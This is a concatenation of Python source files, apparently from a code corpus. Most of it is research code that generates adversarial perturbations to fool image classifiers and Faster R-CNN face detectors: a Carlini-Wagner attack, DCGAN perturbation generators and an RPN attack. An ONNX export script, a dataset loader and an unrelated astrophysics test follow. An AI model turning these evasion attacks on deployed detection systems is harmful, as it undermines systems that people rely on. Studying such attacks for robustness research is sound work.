Only supports untargeted attacks.
- confidence : Confidence of adversarial examples: higher produces examples
with larger l2 distortion, but more strongly classified as adversarial.
Set to 0 in the paper.
- learning_rate : The learning rate for the attack algorithm. Smaller values produce
better results but are slower to converge.
- binary_search_steps : The number of times we perform binary search to find the
optimal tradeoff-constant between norm of the perturbation and confidence
of the classification.
- max_iterations : The maximum number of iterations. Setting this to a larger value
will produce lower distortion results. Using only a few iterations requires
a larger learning rate, and will produce larger distortion results.
- initial_const : The initial tradeoff-constant to use to tune the relative
importance of size of the perturbation and confidence of classification.
If binary_search_steps is large, the initial constant is not important.
A smaller value of this constant gives lower distortion results.
This is c in the formula in the paper.
- clip_min : Minimum input component value.
- clip_max : Maximum input component value.
- num_labels : Number of classes in the model's output.
- verbose : Print output in detail.
"""
self.confidence = confidence
self.learning_rate = learning_rate
self.initial_const = initial_const
self.num_labels = num_labels
self.binary_search_steps = binary_search_steps
self.repeat = binary_search_steps >= 10
self.max_iterations = max_iterations
# allows early aborts if gradient descent is unable to make progress
self.abort_early = True
self.verbose = verbose
self.clip_min = clip_min
self.clip_max = clip_max
self.cuda = torch.cuda.is_available()
def _compare(self, prediction, label):
"""
Return True if label is not the most likely class.
If there is a prediction for each class, prediction[label] should be at least
self.confidence from being the most likely class.
"""
if not isinstance(prediction, (float, int, np.int64)):
prediction = np.copy(prediction)
prediction[label] += self.confidence
prediction = np.argmax(prediction)
return prediction != label
def _optimize(self, model, optimizer, modifier, inputs, labels, scale_const):
"""
Calculate loss and optimize for modifier here. Return the loss, adversarial inputs,
and predicted classes. Since the attack is untargeted, aim to make label the least
likely class.
modifier is the variable we're optimizing over (w in the paper).
Don't think of it as weights in a NN; there is a unique w for each x in the batch.
"""
inputs_adv = (torch.tanh(modifier + inputs) + 1) * 0.5
inputs_adv = inputs_adv * (self.clip_max - self.clip_min) + self.clip_min
# outputs BEFORE SOFTMAX
predicted = model(inputs_adv)
# before taking the L2 distance between the original and perturbed inputs,
# transform the original inputs in the same way (arctan, then clip)
unmodified = (torch.tanh(inputs) + 1) * 0.5
unmodified = unmodified * (self.clip_max - self.clip_min) + self.clip_min
dist = L2_dist(inputs_adv, unmodified)
loss2 = dist.sum()
# compute probability of label class and maximum other
real = (labels * predicted).sum(1)
other = ((1. - labels) * predicted - labels * 10000.).max(1)[0]
# the greater the likelihood of label, the greater the loss
loss1 = torch.clamp(real - other + self.confidence, min=0.) # equiv to max(..., 0.)
loss1 = torch.sum(scale_const * loss1)
loss = loss1 + loss2
optimizer.zero_grad()
loss.backward()
optimizer.step()
# convert to numpy form before returning it
loss = loss.data.cpu().numpy()[0]
dist = dist.data.cpu().numpy()
predicted = predicted.data.cpu().numpy()
# inputs_adv = inputs_adv.data.permute(0, 2, 3, 1).cpu().numpy()
return loss, dist, predicted, inputs_adv
def attack(self, inputs, labels, model, *args):
"""
Given a set of inputs, labels, and the model, return the perturbed inputs (as Variable objects).
inputs and labels should be Variable objects themselves.
"""
inputs = inputs.clone()
labels = labels.clone()
batch_size = inputs.size(0)
labels = labels.data
# re-scale instances to be within range [0, 1]
input_vars = (inputs.data - self.clip_min) / (self.clip_max - self.clip_min)
input_vars = torch.clamp(input_vars, 0., 1.)
# now convert to [-1, 1]
input_vars = (input_vars * 2) - 1
# convert to tanh-space
input_vars = input_vars * .999999
input_vars = (torch.log((1 + input_vars) / (1 - input_vars))) * 0.5 # arctanh
input_vars = Variable(input_vars, requires_grad=False)
# set the lower and upper bounds accordingly
lower_bound = np.zeros(batch_size)
scale_const = np.ones(batch_size) * self.initial_const
upper_bound = np.ones(batch_size) * 1e10
# numpy placeholders for the overall best l2, most likely label, and adversarial image
o_best_l2 = [1e10] * batch_size
o_best_score = [-1] * batch_size
o_best_attack = inputs.clone()
# one-hot encoding of labels
one_hot_labels = torch.zeros(labels.size() + (self.num_labels,))
if self.cuda: one_hot_labels = one_hot_labels.cuda()
one_hot_labels.scatter_(1, labels.unsqueeze(1), 1.)
label_vars = Variable(one_hot_labels, requires_grad=False)
# setup the modifier variable; this is the variable we are optimizing over
modifier = torch.zeros(inputs.size()).float()
modifier_var = Variable(modifier.cuda() if self.cuda else modifier, requires_grad=True)
optimizer = optim.Adam([modifier_var], lr=self.learning_rate)
for outer_step in range(self.binary_search_steps):
            if self.verbose: print('\nsearch step: {0}'.format(outer_step))
best_l2 = [1e10] * batch_size
best_score = [-1] * batch_size
# last iteration (if we run many steps) repeat the search once
if self.repeat and outer_step == self.binary_search_steps - 1:
scale_const = upper_bound
            scale_const_tensor = torch.from_numpy(scale_const).float()  # .float() needed to convert to FloatTensor
scale_const_var = Variable(scale_const_tensor.cuda() if self.cuda else scale_const_tensor, requires_grad=False)
prev_loss = 1e3 # for early abort
for step in range(self.max_iterations):
loss, dist, predicted, input_adv = self._optimize(model, optimizer, modifier_var,
input_vars, label_vars, scale_const_var)
if step % 10 == 0 or step == self.max_iterations - 1:
if self.verbose: print "Step: {0:>4}, loss: {1:6.6f}, dist: {2:8.6f}, modifier mean: {3:.6e}".format(
step, loss, dist.mean(), modifier_var.data.mean())
# abort early if loss is too small
if self.abort_early and step % (self.max_iterations // 10) == 0:
if loss > prev_loss * 0.9999:
                        if self.verbose: print('Aborting early...')
break
prev_loss = loss
# update best result for each image
for i in range(batch_size):
y_hat = np.argmax(predicted[i])
y = labels[i]
# if smaller perturbation and still different predicted class ...
if dist[i] < best_l2[i] and self._compare(y_hat, y):
best_l2[i] = dist[i]
best_score[i] = y_hat
# update overall best results
if dist[i] < o_best_l2[i] and self._compare(y_hat, y):
o_best_l2[i] = dist[i]
o_best_score[i] = y_hat
o_best_attack[i] = input_adv[i]
sys.stdout.flush()
# adjust constants
batch_failure, batch_success = 0, 0
for i in range(batch_size):
if self._compare(best_score[i], labels[i]) and best_score[i] != -1:
# successful, do binary search and divide const by two
upper_bound[i] = min(upper_bound[i], scale_const[i])
if upper_bound[i] < 1e9:
scale_const[i] = (lower_bound[i] + upper_bound[i]) / 2
else:
# failure, multiply by 10 if no solution found
# or do binary search with the known upper bound
lower_bound[i] = max(lower_bound[i], scale_const[i])
upper_bound[i] = (lower_bound[i] + upper_bound[i]) / 2 if (upper_bound[i] < 1e9) else (scale_const[i] * 10)
if self._compare(o_best_score[i], labels[i]) and o_best_score[i] != -1:
batch_success += 1
else:
batch_failure += 1
            if self.verbose: print('failures: {0} successes: {1}'.format(batch_failure, batch_success))
sys.stdout.flush()
# if no good adv attack, then equivalent to using base image
for i in range(len(o_best_score)):
if o_best_score[i] == -1:
o_best_score[i] = labels[i]
o_best_score = np.array(o_best_score)
num_unperturbed = (o_best_score == labels.cpu().numpy()).sum()
return o_best_attack, o_best_score, num_unperturbed
class DCGAN(nn.Module):
def __init__(self, num_channels=3, ngf=100, cg=0.05, learning_rate=1e-4, train_adv=False):
"""
Initialize a DCGAN. Perturbations from the GAN are added to the inputs to
create adversarial attacks.
- num_channels is the number of channels in the input
- ngf is size of the conv layers
- cg is the normalization constant for perturbation (higher means encourage smaller perturbation)
- learning_rate is learning rate for generator optimizer
- train_adv is whether the model being attacked should be trained adversarially
"""
super(DCGAN, self).__init__()
self.generator = nn.Sequential(
# input is (nc) x 32 x 32
nn.Conv2d(num_channels, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 1, 1, 0, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 3 x 32 x 32
nn.Conv2d(ngf, num_channels, 1, 1, 0, bias=True),
nn.Tanh()
)
self.cuda = torch.cuda.is_available()
if self.cuda:
self.generator.cuda()
self.generator = torch.nn.DataParallel(self.generator, device_ids=range(torch.cuda.device_count()))
cudnn.benchmark = True
# self.criterion = nn.NLLLoss()
self.criterion = nn.CrossEntropyLoss(size_average=False)
self.cg = cg
self.optimizer = optim.Adam(self.generator.parameters(), lr=learning_rate)
self.train_adv = train_adv
self.max_iter = 20
self.c_misclassify = 1
self.confidence = 0
def forward(self, inputs, model, labels=None, bboxes=None, scale=None,\
model_feats=None, model_optimizer=None, *args):
"""
Given a set of inputs, return the perturbed inputs (as Variable objects),
the predictions for the inputs from the model, and the percentage of inputs
        unsuccessfully perturbed (i.e., model accuracy).
        If self.train_adv is True, train the model adversarially.
        The adversarial inputs are returned as a python list of tensors.
        The predictions are a numpy array of classes, with length equal to the number of inputs.
"""
num_unperturbed = 10
iter_count = 0
loss_perturb = 20
loss_misclassify = 10
while loss_misclassify > 0 and loss_perturb > 1:
perturbation = self.generator(inputs)
adv_inputs = inputs + perturbation
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
scores,gt_labels = model(adv_inputs,\
bboxes,labels,scale,attack=True)
probs = F.softmax(scores)
suppress_labels,probs,mask = model.faster_rcnn._suppress(None,probs,attack=True)
scores = scores[mask]
gt_labels = gt_labels[mask]
self.optimizer.zero_grad()
try:
one_hot_labels = torch.zeros(gt_labels.size() + (2,))
if self.cuda: one_hot_labels = one_hot_labels.cuda()
one_hot_labels.scatter_(1, gt_labels.unsqueeze(1).data, 1.)
labels_vars = Variable(one_hot_labels, requires_grad=False)
real = (labels_vars * scores).sum(1)
other = ((1. - labels_vars) * scores - labels_vars * 10000.).max(1)[0]
# the greater the likelihood of label, the greater the loss
loss1 = torch.clamp(real - other + self.confidence, min=0.) # equiv to max(..., 0.)
loss_misclassify = self.c_misclassify*torch.sum(loss1)
loss_match = Variable(torch.zeros(1)).cuda()
loss_perturb = self.cg*L2_dist(inputs,adv_inputs)
loss_total = loss_misclassify + loss_perturb
loss_total.backward()
self.optimizer.step()
except:
loss_misclassify = Variable(torch.zeros(1)).cuda()
loss_match = Variable(torch.zeros(1)).cuda()
loss_perturb = self.cg*L2_dist(inputs,adv_inputs)
loss_total = loss_misclassify + loss_perturb
loss_total.backward()
print('Loss NLL is %f, perturb %f, total loss %f' % \
(loss_misclassify.data,loss_perturb.data,loss_total.data))
# optimizer step for the generator
if loss_misclassify.data !=0:
predictions = torch.max(F.log_softmax(scores), 1)[1].cpu().numpy()
num_unperturbed = (predictions == gt_labels).sum()
print("Number of images unperturbed is %d out of %d" % \
(num_unperturbed,len(gt_labels)))
iter_count = iter_count + 1
losses = [Variable(loss_misclassify.data),Variable(torch.zeros(1)).cuda(),Variable(loss_perturb.data)]
losses = losses + [sum(losses)]
if iter_count > self.max_iter:
break
return losses
def perturb(self, inputs, epsilon=1, save_perturb=None):
perturbation = self.generator(inputs)
adv_inputs = inputs + epsilon*perturbation
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
if save_perturb is not None:
clamped = torch.clamp(perturbation,-1.0,1.0)
return adv_inputs,clamped
else:
return adv_inputs
def save(self, fn):
torch.save(self.generator.state_dict(), fn)
def load(self, fn):
self.generator.load_state_dict(torch.load(fn))
class Inference_DCGAN(nn.Module):
def __init__(self, num_channels=3, ngf=100, cg=0.05, learning_rate=1e-4, train_adv=False):
"""
Initialize a Inference_DCGAN. Perturbations from the GAN are added to the inputs to
create adversarial attacks.
- num_channels is the number of channels in the input
- ngf is size of the conv layers
- cg is the normalization constant for perturbation (higher means encourage smaller perturbation)
"""
super(Inference_DCGAN, self).__init__()
self.generator = nn.Sequential(
# input is (nc) x 32 x 32
nn.Conv2d(num_channels, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 1, 1, 0, bias=True),
nn.LeakyReLU(0.2, inplace=True),
# state size. 3 x 32 x 32
nn.Conv2d(ngf, num_channels, 1, 1, 0, bias=True),
nn.Tanh()
)
self.cuda = torch.cuda.is_available()
if self.cuda:
self.generator.cuda()
self.generator = torch.nn.DataParallel(self.generator, device_ids=range(torch.cuda.device_count()))
cudnn.benchmark = True
def forward(self, inputs, epsilon=1, save_perturb=None):
perturbation = self.generator.module(inputs)
adv_inputs = inputs + epsilon*perturbation
# adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
adv_inputs.clamp(-1.0, 1.0)
if save_perturb is not None:
clamped = torch.clamp(perturbation,-1.0,1.0)
return adv_inputs,clamped
else:
return adv_inputs
def save(self, fn):
torch.save(self.generator.state_dict(), fn)
def load(self, fn):
self.generator.load_state_dict(torch.load(fn))
class RPN_attack(nn.Module):
def __init__(self, num_channels=3, ngf=80, cg=0.0005, learning_rate=1e-4, train_adv=False):
"""
Initialize a DCGAN. Perturbations from the GAN are added to the inputs to
create adversarial attacks.
- num_channels is the number of channels in the input
- ngf is size of the conv layers
- cg is the normalization constant for perturbation (higher means encourage smaller perturbation)
- learning_rate is learning rate for generator optimizer
- train_adv is whether the model being attacked should be trained adversarially
"""
super(RPN_attack, self).__init__()
self.generator = nn.Sequential(
# input is (nc) x 32 x 32
nn.Conv2d(num_channels, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 1, 1, 0, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 3 x 32 x 32
nn.Conv2d(ngf, num_channels, 1, 1, 0, bias=False),
nn.Tanh()
)
self.cuda = torch.cuda.is_available()
if self.cuda:
self.generator.cuda()
self.generator = torch.nn.DataParallel(self.generator, device_ids=range(torch.cuda.device_count()))
cudnn.benchmark = True
# self.nll_criterion = nn.NLLLoss(ignore_index=-1)
self.criterion = nn.CrossEntropyLoss(ignore_index=-1)
self.cg = cg
self.optimizer = optim.Adam(self.generator.parameters(), lr=learning_rate)
self.train_adv = train_adv
self.max_iter = 1
self.c_misclassify = 1
def forward(self, inputs, labels, img_size, scale, model, model_optimizer=None, *args):
"""
Given a set of inputs, return the perturbed inputs (as Variable objects),
the predictions for the inputs from the model, and the percentage of inputs
        unsuccessfully perturbed (i.e., model accuracy).
        If self.train_adv is True, train the model adversarially.
        The adversarial inputs are returned as a python list of tensors.
        The predictions are a numpy array of classes, with length equal to the number of inputs.
"""
num_unperturbed = 10
iter_count = 0
while num_unperturbed > 5 and iter_count < self.max_iter:
perturbation = self.generator(inputs)
adv_inputs = inputs + perturbation
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
adv_features = model.faster_rcnn.extractor(adv_inputs)
adv_rpn_locs, adv_rpn_scores, adv_rois, adv_roi_indices, anchor = \
model.faster_rcnn.rpn(adv_features, img_size, scale)
# log_probs = F.log_softmax(adv_rpn_scores.squeeze(),dim=1)
# exponent value (p) in the norm needs to be 4 or higher! IMPORTANT!
self.optimizer.zero_grad()
loss_NLL = self.c_misclassify*torch.exp(\
-1*self.criterion(adv_rpn_scores.squeeze(),labels))
loss_match = Variable(torch.zeros(1)).cuda()
loss_perturb = 0.0001 * (torch.norm(perturbation,2))
loss_total = loss_NLL + loss_perturb#sum([loss_NLL,loss_perturb])
loss_total.backward()
print('Loss NLL is %f, match %f, perturb %f, total loss %f' % \
(loss_NLL.data,loss_match.data,torch.norm(perturbation,2).data[0],loss_total.data))
# optimizer step for the generator
self.optimizer.step()
# optimizer step for the discriminator (if training adversarially)
# if self.train_adv and model_optimizer:
# discriminator_loss = self.criterion(predictions, labels)
# model_optimizer.zero_grad()
# discriminator_loss.backward()
# model_optimizer.step()
# print perturbation.data.mean(), inputs.data.mean()
# print loss.data[0], torch.norm(perturbation, 2).data[0], torch.norm(inputs, 2).data[0]
# prep the predictions and inputs to be returned
predictions = torch.max(F.log_softmax(adv_rpn_scores.squeeze(),dim=1), 1)[1].cpu().numpy()
num_unperturbed = (predictions == labels.data.cpu().numpy()).sum()
print("Number of images unperturbed is %d out of %d" % \
(num_unperturbed,len(labels)))
iter_count = iter_count + 1
losses = [loss_NLL,loss_match,loss_perturb]
losses = losses + [sum(losses)]
return losses
# adv_inputs = [ adv_inputs[i] for i in range(inputs.size(0)) ]
def perturb(self, inputs, epsilon=1.0):
perturbation = self.generator(inputs)
adv_inputs = inputs + epsilon*perturbation
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
return adv_inputs
def save(self, fn):
torch.save(self.generator.state_dict(), fn)
def load(self, fn):
self.generator.load_state_dict(torch.load(fn))
```
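`FGSM.attack()` above reads `inputs.grad`, so the caller must first run a backward pass with gradients enabled on the inputs. A minimal usage sketch under that assumption is shown below; the classifier `model`, images and labels are placeholders rather than objects from this repository, and the old-style `Variable` API is kept to match the code above:

```python
import torch.nn.functional as F
from torch.autograd import Variable

def run_fgsm(model, images, labels, epsilon=0.25):
    inputs = Variable(images, requires_grad=True)   # gradients w.r.t. the inputs
    targets = Variable(labels)
    loss = F.cross_entropy(model(inputs), targets)
    loss.backward()                                 # populates inputs.grad, which FGSM.attack uses
    attacker = FGSM(epsilon=epsilon)
    return attacker.attack(inputs, targets, model)  # (adv_inputs, predictions, num_unperturbed)
```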
#### File: joeybose/simple-faster-rcnn-pytorch/convert2onnx.py
```python
from __future__ import division
import os
from PIL import Image
from wider import WIDER
from skimage import transform as sktsf
from data.dataset import Dataset, TestDataset,inverse_normalize
from data.dataset import pytorch_normalze
import numpy as np
import ipdb
import torch
import matplotlib
from torch.utils.data import Dataset, DataLoader
import matplotlib.pyplot as plt
from tqdm import tqdm
from utils.config import opt
from model import FasterRCNNVGG16
from torch.autograd import Variable
from torch.utils import data as data_
from trainer import FasterRCNNTrainer,VictimFasterRCNNTrainer
from utils import array_tool as at
import utils.vis_tool as vz
from utils.vis_tool import visdom_bbox
from utils.vis_tool import vis_bbox,visdom_bbox
from utils.eval_tool import eval_detection_voc
from data.util import read_image
import pandas as pd
import attacks
import cv2
import torch.onnx
import caffe2.python.onnx.backend as backend
import onnx
def preprocess(img, min_size=600, max_size=1000):
"""Preprocess an image for feature extraction.
The length of the shorter edge is scaled to :obj:`self.min_size`.
After the scaling, if the length of the longer edge is longer than
:obj:`self.max_size`, the image is scaled to fit the longer edge
to :obj:`self.max_size`.
After resizing the image, the image is subtracted by a mean image value
:obj:`self.mean`.
Args:
img (~numpy.ndarray): An image. This is in CHW and RGB format.
The range of its value is :math:`[0, 255]`.
Returns:
~numpy.ndarray:
A preprocessed image.
"""
C, H, W = img.shape
scale1 = min_size / min(H, W)
scale2 = max_size / max(H, W)
scale = min(scale1, scale2)
img = img / 255.
try:
img = sktsf.resize(img, (C, H * scale, W * scale), mode='reflect')
except:
ipdb.set_trace()
# both the longer and shorter should be less than
# max_size and min_size
normalize = pytorch_normalze
return normalize(img)
if __name__ == '__main__':
attacker = attacks.Inference_DCGAN(train_adv=False)
attacker.load('/home/joey/Desktop/simple-faster-rcnn-pytorch/checkpoints/max_min_attack_6.pth')
attacker.cpu()
attacker.train(False)
img = read_image('/home/joey/Desktop/simple-faster-rcnn-pytorch/akira_img.jpeg')
img = preprocess(img)
img = torch.from_numpy(img)[None]
img = Variable(img.float())
adv_img = attacker(img,epsilon=1)
# Export ONNX model
torch.onnx.export(attacker, img, "attacker.proto", export_params=True, verbose=True)
# Load ONNX model
model = onnx.load("attacker.proto")
graph = model.graph
# Check Formation
onnx.checker.check_model(model)
onnx.helper.printable_graph(model.graph)
# Print Graph to get blob names
onnx.helper.printable_graph(graph)
# Check model output
ipdb.set_trace()
rep = backend.prepare(graph, device="CPU")
output_onnx = rep.run(img.cpu().data.numpy().astype(np.float32))
# Verify the numerical correctness upto 3 decimal places
np.testing.assert_almost_equal(adv_img.data.cpu().numpy(),
output_onnx[0], decimal=3)
```
#### File: simple-faster-rcnn-pytorch/data/dataset.py
```python
from __future__ import division
import torch as t
from .voc_dataset import VOCBboxDataset
from .wider_dataset import WIDERBboxDataset
from skimage import transform as sktsf
from torchvision import transforms as tvtsf
from . import util
import numpy as np
import pandas as pd
from utils.config import opt
from .util import read_image
import torch
import ipdb
def inverse_normalize(img):
if opt.caffe_pretrain:
img = img + (np.array([122.7717, 115.9465, 102.9801]).reshape(3, 1, 1))
return img[::-1, :, :]
# approximate un-normalize for visualize
return (img * 0.5 + 0.5).clip(min=0, max=1) * 255
def pytorch_normalze(img):
"""
https://github.com/pytorch/vision/issues/223
return appr -1~1 RGB
"""
# normalize = tvtsf.Normalize(mean=[0.485, 0.456, 0.406],
# std=[0.229, 0.224, 0.225])
normalize = tvtsf.Normalize(mean=[0.5, 0.5, 0.5],
std=[0.5, 0.5, 0.5])
img = normalize(t.from_numpy(img))
return img.numpy()
def caffe_normalize(img):
"""
return appr -125-125 BGR
"""
img = img[[2, 1, 0], :, :] # RGB-BGR
img = img * 255
mean = np.array([122.7717, 115.9465, 102.9801]).reshape(3, 1, 1)
img = (img - mean).astype(np.float32, copy=True)
return img
def preprocess(img, min_size=600, max_size=1000):
"""Preprocess an image for feature extraction.
The length of the shorter edge is scaled to :obj:`self.min_size`.
After the scaling, if the length of the longer edge is longer than
:obj:`self.max_size`, the image is scaled to fit the longer edge
to :obj:`self.max_size`.
After resizing the image, the image is subtracted by a mean image value
:obj:`self.mean`.
Args:
img (~numpy.ndarray): An image. This is in CHW and RGB format.
The range of its value is :math:`[0, 255]`.
Returns:
~numpy.ndarray:
A preprocessed image.
"""
C, H, W = img.shape
scale1 = min_size / min(H, W)
scale2 = max_size / max(H, W)
scale = min(scale1, scale2)
img = img / 255.
img = sktsf.resize(img, (C, H * scale, W * scale), mode='reflect')
# both the longer and shorter should be less than
# max_size and min_size
if opt.caffe_pretrain:
normalize = caffe_normalize
else:
normalize = pytorch_normalze
return normalize(img)
class Transform(object):
def __init__(self, min_size=600, max_size=1000):
self.min_size = min_size
self.max_size = max_size
def __call__(self, in_data):
img, bbox, label = in_data
_, H, W = img.shape
img = preprocess(img, self.min_size, self.max_size)
_, o_H, o_W = img.shape
scale = o_H / H
bbox = util.resize_bbox(bbox, (H, W), (o_H, o_W))
# horizontally flip
img, params = util.random_flip(
img, x_random=True, return_param=True)
bbox = util.flip_bbox(
bbox, (o_H, o_W), x_flip=params['x_flip'])
return img, bbox, label, scale
class Dataset:
def __init__(self, opt):
self.opt = opt
if opt.data == 'wider':
self.db = WIDERBboxDataset(opt.wider_label_dir,\
opt.wider_data_dir,opt.wider_fname_mat)
else:
self.db = VOCBboxDataset(opt.voc_data_dir)
self.tsf = Transform(opt.min_size, opt.max_size)
def __getitem__(self, idx):
ori_img, bbox, label, difficult = self.db.get_example(idx)
img, bbox, label, scale = self.tsf((ori_img, bbox, label))
# TODO: check whose stride is negative to fix this instead copy all
# some of the strides of a given numpy array are negative.
return img.copy(), bbox.copy(), label.copy(), scale
def __len__(self):
return len(self.db)
class FaceLandmarksDataset(Dataset):
"""Face Landmarks dataset."""
def __init__(self):
"""
Args:
csv_file (string): Path to the csv file with annotations.
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.csv_file = '../ext_face/cropped_global_300w.csv'
self.globalDF = pd.read_csv(self.csv_file)
self.g_images = self.globalDF['imgPath']
self.save_dir = '/media/drive/ibug/300W_cropped/frcnn/'
self.save_dir_adv = '/media/drive/ibug/300W_cropped/frcnn_adv/'
self.save_dir_comb = '/media/drive/ibug/300W_cropped/frcnn_comb/'
def __len__(self):
return len(self.g_images)
def __getitem__(self, idx):
img = read_image(self.g_images[idx])
_, H, W = img.shape
scale = H / H
try:
img = preprocess(img)
img, params = util.random_flip(
img, x_random=True, return_param=True)
except:
print("Exception")
img = torch.from_numpy(img)[None]
return img,self.g_images[idx],scale
class TestDataset:
def __init__(self, opt, split='test', use_difficult=True):
self.opt = opt
self.db = WIDERBboxDataset(opt.wider_label_dir,\
opt.wider_val_data_dir,opt.wider_val_fname_mat)
def __getitem__(self, idx):
ori_img, bbox, label, difficult = self.db.get_example(idx)
img = preprocess(ori_img)
return img, ori_img.shape[1:], bbox, label, difficult
def __len__(self):
return len(self.db)
``` |
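To make the scaling rule in `preprocess()` concrete, here is a small worked example (the image shape and sizes are illustrative only):

```python
# For a CHW image of shape (3, 500, 1500) with min_size=600 and max_size=1000:
#   scale1 = 600 / 500   = 1.2    (would bring the short edge up to 600)
#   scale2 = 1000 / 1500 ~ 0.667  (caps the long edge at 1000)
#   scale  = min(scale1, scale2) ~ 0.667
# so the image is resized to roughly (3, 333, 1000), satisfying both constraints.
C, H, W = 3, 500, 1500
scale = min(600 / min(H, W), 1000 / max(H, W))
print(round(H * scale), round(W * scale))  # -> 333 1000
```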
{
"source": "Joeybraspenning/pyxsim",
"score": 2
} |
#### File: pyxsim/tests/test_sloshing.py
```python
import numpy as np
from pyxsim import \
ThermalSourceModel, \
EventList, make_photons, \
project_photons, merge_files
from pyxsim.tests.utils import hdf5_answer_testing, file_answer_testing
from numpy.testing import assert_array_equal
from numpy.random import RandomState
import yt
import h5py
gslr = "GasSloshingLowRes/sloshing_low_res_hdf5_plt_cnt_0300"
def test_sloshing(answer_store, answer_dir):
prng = RandomState(0x4d3d3d3)
ds = yt.load(gslr, default_species_fields="ionized")
A = 2000.
exp_time = 1.0e4
redshift = 0.1
sphere = ds.sphere("c", (0.5, "Mpc"))
sphere.set_field_parameter("X_H", 0.75)
thermal_model = ThermalSourceModel("apec", 0.1, 11.0, 10000, 0.3,
thermal_broad=False, prng=prng)
n_photons1, n_cells1 = make_photons("photons1", sphere, redshift, A,
exp_time, thermal_model)
hdf5_answer_testing("photons1.h5", answer_store, answer_dir)
n_events1 = project_photons("photons1", "events1", [1.0, -0.5, 0.2],
[30., 45.], absorb_model="tbabs", nH=0.1,
prng=prng)
hdf5_answer_testing("events1.h5", answer_store, answer_dir)
events1 = EventList("events1.h5")
events1.write_fits_file("test_events.fits", (20.0, "arcmin"), 1024)
events1.write_spectrum("test_spec.fits", 0.2, 10.0, 2000)
events1.write_fits_image("test_img.fits", (20.0, "arcmin"), 1024)
file_answer_testing("EVENTS", "test_events.fits", answer_store,
answer_dir)
file_answer_testing("SPECTRUM", "test_spec.fits", answer_store,
answer_dir)
n_photons2, n_cells2 = make_photons("photons2", sphere, redshift, A,
exp_time, thermal_model)
n_events2 = project_photons("photons2", "events2", [1.0, -0.5, 0.2],
[30., 45.], absorb_model="tbabs", nH=0.1,
prng=prng)
merge_files(["photons1.h5", "photons2.h5"], "photons.h5")
merge_files(["events1.h5", "events2.h5"], "events.h5")
with h5py.File("photons.h5", "r") as f, h5py.File("photons1.h5", "r") as f1, \
h5py.File("photons2.h5", "r") as f2:
assert f["data"]["energy"].size == n_photons1 + n_photons2
assert f["data"]["x"].size == n_cells1 + n_cells2
for k in f["data"]:
assert_array_equal(f["data"][k][()],
np.concatenate([f1["data"][k][()],
f2["data"][k][()]]))
with h5py.File("events.h5", "r") as f, h5py.File("events1.h5", "r") as f1, \
h5py.File("events2.h5", "r") as f2:
assert f["data"]["eobs"].size == n_events1 + n_events2
for k in f["data"]:
assert_array_equal(f["data"][k][()],
np.concatenate([f1["data"][k][()],
f2["data"][k][()]]))
``` |
{
"source": "joeybryson001/machine_learning",
"score": 3
} |
#### File: joeybryson001/machine_learning/alternative_error_calculation.py
```python
import math


def calculate_error_2(m,c,data):
total_error_squared = 0
for i in range(len(data)):
y_intercept = data[i][1] + (data[i][0] / m)
x_of_closest_point = (y_intercept - c) / (m - ((-1) / m))
y_of_closest_point = m * x_of_closest_point + c
error = math.sqrt(((x_of_closest_point - data[i][0]) ** 2) + ((y_of_closest_point - data[i][1]) ** 2))
total_error_squared += error ** 2
return total_error_squared
```
